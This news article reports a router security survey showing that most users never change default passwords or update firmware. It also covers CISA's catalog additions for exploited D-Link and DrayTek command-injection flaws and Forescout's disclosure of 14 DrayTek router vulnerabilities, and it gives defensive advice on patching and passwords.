Alarming Cybersecurity Lapses Exposed in Recent Router Security Survey

If you are reading this, you may unknowingly be leaving yourself vulnerable to hackers. Recent research indicates that a staggering 86% of broadband users lack a fundamental understanding of cybersecurity, particularly regarding the security of their devices that connect to the internet. This figure represents the number of individuals who have never changed the factory default password for their broadband routers, a situation that security experts deem extremely concerning. Here’s why this is critical and the immediate steps you should take to protect yourself.

The Broadband Genie Router Security Survey has unveiled alarming insights into the security practices—or lack thereof—of internet users. The survey, conducted to assess changes in router security attitudes compared to similar surveys from 2018 and 2022, included responses from over 3,000 users. The findings reveal that 52% of users have never accessed their router settings to alter the device from its factory default state. Even more troubling, 86% admitted to never changing the factory-set administrator password. These figures indicate a worrying trend, as they demonstrate a decline in cybersecurity awareness among broadband users.

For someone who spends significant time educating non-technical audiences about essential security hygiene, this trend is disheartening. The need to change your router’s default admin password should be the first action taken when setting up the device.

“Leaving the password as the default is the easiest way for someone to gain access to your router and, therefore, your network and connected devices,” warned Alex Toft, Broadband Genie’s broadband expert. “It’s an open invitation to nefarious characters to snoop around and take what’s yours.” Once you set a strong password, you should only need to change it if it has been compromised.

The urgency of this recommendation diminishes if your router is a newer model with a unique admin password instead of a standard one used by multiple users. However, if this password is too short or easy to guess, it remains prudent to change it. The survey also indicated poor practices regarding Wi-Fi passwords, with 72% of users reporting that they never change their Wi-Fi password. While this may not pose an immediate risk for many users, it is still a good practice. “Similar to the router admin password, default Wi-Fi passwords are well known,” Toft noted. “It would take seconds for a knowledgeable hacker to gain access.”

Passwords are not the only areas where users exhibit a lack of vigilance. A staggering 89% of respondents said they never update their router firmware, which is one of the most concerning findings from a security standpoint. This represents a slight increase from the 2022 survey, suggesting that the message about the importance of updates is not resonating strongly enough. “Failing to update can leave routers vulnerable,” Toft cautioned. “This result isn’t the one we wanted to see.” Although updating router firmware can be complex, newer routers are simplifying the process by implementing automatic updates.

“Cybercriminals take advantage of bugs and vulnerabilities in firmware to gain access to your online information,” said Oliver Devane, a senior security researcher at McAfee. “Keeping the firmware up to date with the latest security patches will prevent this from happening.”

To address these serious security oversights, Broadband Genie researchers recommend that all internet router users take immediate action by following these steps, utilizing the vendor-provided instructions or consulting with your internet service provider for assistance:

1. Disconnect your internet and perform a full factory reset of the router.
2. Change your router admin password, Wi-Fi password, and network name to unique identifiers without delay.

The Cybersecurity and Infrastructure Security Agency (CISA) in the United States has also issued a formal directive urging federal agencies to apply mitigations for two security vulnerabilities actively exploited by hackers targeting different router types. While this mandate legally pertains only to federal employees, CISA advises all organizations to consult the Known Exploited Vulnerabilities catalog to stay informed about ongoing threats and incorporate this information into their vulnerability management frameworks.

CISA has added two vulnerabilities to its Known Exploited Vulnerabilities Catalog based on confirmed exploitation by hackers, which mandates federal agencies to remediate the zero-day vulnerabilities within a maximum timeframe of 60 days, with even shorter deadlines for critical-rated vulnerabilities. These vulnerabilities affect routers from D-Link and DrayTek, both relating to operating system command injections. According to CISA, these vulnerabilities “pose significant risks” and are “frequent attack vectors for malicious cyber actors.”

CVE-2023-25280, an OS command injection vulnerability in D-Link DIR-820 routers, could allow a remote, unauthenticated attacker to escalate their privileges to root level through a maliciously crafted payload. Although the use of this exploit in ransomware attacks is currently unknown, CISA recommends discontinuing the affected router model due to its end-of-life status, along with seeking security advice from D-Link.

CVE-2020-15415 impacts Vigor3900, Vigor2960, and Vigor300B routers from DrayTek, allowing remote code execution through shell metacharacters within a filename when using a text/x-python-script content type. CISA advises applying mitigations as outlined by the vendor, with further security guidance available from DrayTek.

Additionally, research released on October 2 by Vedere Labs at Forescout Research has identified 14 new vulnerabilities in DrayTek routers. The report, titled “DRAY:BREAK Breaking Into DrayTek Routers Before Threat Actors Do It Again,” authored by Stanislav Dashevskyi and Francesco La Spina, describes how the researchers discovered one vulnerability with a maximum severity rating of 10, another rated 9.1, and nine classified as medium severity. The vulnerabilities impact users in 168 countries, leaving approximately 704,000 routers susceptible to risks such as distributed denial of service attacks, botnet exploitation, and ransomware. Forescout revealed that around 425,000 affected routers are located in the U.K. and EU, while over 190,000 are in Asia, with only 7,200 found in North America.

Forescout highlighted that DrayTek routers are particularly attractive to cybercriminals due to their widespread use across various industries. “Routers are crucial for keeping internal systems connected to the outside world, yet too many organizations overlook their security until they are exploited by attackers,” stated Barry Mainz, Forescout CEO. “Cybercriminals work around the clock to find cracks in routers’ defenses, using them as entry points to steal data or cripple business operations.”

The vulnerabilities identified by CISA could enable attackers to execute remote code using an operating system command injection exploit. Some of the reported issues include:

1. The same admin credentials were used across the entire system, including guest and host operating systems. If obtained, these credentials could lead to a complete system compromise.
2. The “GetCGI()” function in the Web UI was vulnerable to a buffer overflow when processing query string parameters.
3. Several buffer overflow issues in the Web UI arose from missing bounds checks when handling CGI form parameters.
4. The web server backend for the Web UI utilized a static string to seed the PRNG in OpenSSL for TLS, potentially allowing attackers to gain information and execute man-in-the-middle attacks.

In total, the vulnerabilities discovered by Vedere Labs affected 24 models of DrayTek routers, with 11 already reaching their end-of-life status. The report indicated that 63% of the exposed devices were either at end-of-sale or end-of-life, complicating the process of patching and protecting against potential exploits.

The positive takeaway is that researchers acted responsibly by disclosing these vulnerabilities to DrayTek promptly. As part of this responsible disclosure process, DrayTek has since patched all firmware vulnerabilities identified by Vedere Labs. “To safeguard against these vulnerabilities, organizations must immediately patch affected DrayTek devices with the latest firmware,” cautioned Daniel dos Santos, head of security research at Forescout Research Vedere Labs. “Disabling unnecessary remote access, implementing access control lists and two-factor authentication, and monitoring for anomalies through syslog logging are all crucial steps.”